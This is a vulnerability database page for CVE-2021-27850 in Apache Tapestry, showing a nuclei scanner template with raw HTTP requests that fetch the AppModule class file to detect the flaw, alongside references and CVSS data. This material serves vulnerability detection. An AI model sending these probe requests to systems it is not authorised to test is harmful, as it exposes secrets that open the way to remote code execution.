Lucene search
K

Apache Tapestry - Remote Code Execution

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 81 Views

Apache Tapestry - Remote Code Execution, critical vulnerability, affects versions 5.4.5, 5.5.0, 5.6.2, 5.7.0, allows remote code execution, bypass of CVE-2019-0195 fi

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for Deserialization of Untrusted Data in Apache Tapestry
25 Jun 202113:55
githubexploit
GithubExploit
Exploit for Deserialization of Untrusted Data in Apache Tapestry
26 Jun 202114:16
githubexploit
ATTACKERKB
CVE-2021-27850
15 Apr 202100:00
attackerkb
Circl
CVE-2021-27850
26 Jun 202113:47
circl
CNNVD
Apache Tapestry 代码问题漏洞
15 Apr 202100:00
cnnvd
CNVD
Apache Tapestry Code Execution Vulnerability
16 Apr 202100:00
cnvd
CVE
CVE-2021-27850
15 Apr 202107:40
cve
Cvelist
CVE-2021-27850 Bypass of the fix for CVE-2019-0195
15 Apr 202107:40
cvelist
Github Security Blog
Remote code execution in Apache Tapestry
16 Jun 202117:33
github
Metasploit
Apache Tapestry HMAC secret key leak
23 Jul 202117:45
metasploit
Rows per page
id: CVE-2021-27850

info:
  name: Apache Tapestry - Remote Code Execution
  author: pdteam
  severity: critical
  description: |
    Apache Tapestry contains a critical unauthenticated remote code execution vulnerability. Affected versions include 5.4.5, 5.5.0, 5.6.2 and 5.7.0. Note that this vulnerability is a bypass of the fix for CVE-2019-0195. Before that fix it was possible to download arbitrary class files from the classpath by providing a crafted asset file URL.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    Apply the latest security patches or updates provided by Apache to fix the vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-27850
    - https://lists.apache.org/thread.html/r237ff7f286bda31682c254550c1ebf92b0ec61329b32fbeb2d1c8751%40%3Cusers.tapestry.apache.org%3E
    - http://www.openwall.com/lists/oss-security/2021/04/15/1
    - https://security.netapp.com/advisory/ntap-20210528-0002/
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-27850
    cwe-id: CWE-502,CWE-200
    epss-score: 0.94089
    epss-percentile: 0.99836
    cpe: cpe:2.3:a:apache:tapestry:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: apache
    product: tapestry
  tags: cve,cve2021,apache,tapestry,vkev,vuln

http:
  - raw:
      - |
        GET /assets/app/something/services/AppModule.class/ HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
      - |
        GET /assets/app/{{id}}/services/AppModule.class/ HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - 'application/java'

      - type: word
        part: body
        words:
          - 'configuration'
          - 'webtools'
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: id
        group: 1
        regex:
          - '\/assets\/app\/([a-z0-9]+)\/services\/AppMod'
        internal: true
        part: header
# digest: 4b0a00483046022100e3036a73e06d39004cb4a2210bc6e7f0ebd30a13386c0488a8c546648a71907f022100a89cbe7a393dbf0e597110dda6bf219420826871c62ed8dcc4d28ff594cbf989:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
8High risk
Vulners AI Score8
CVSS 3.19.8
CVSS 210
EPSS0.94089
81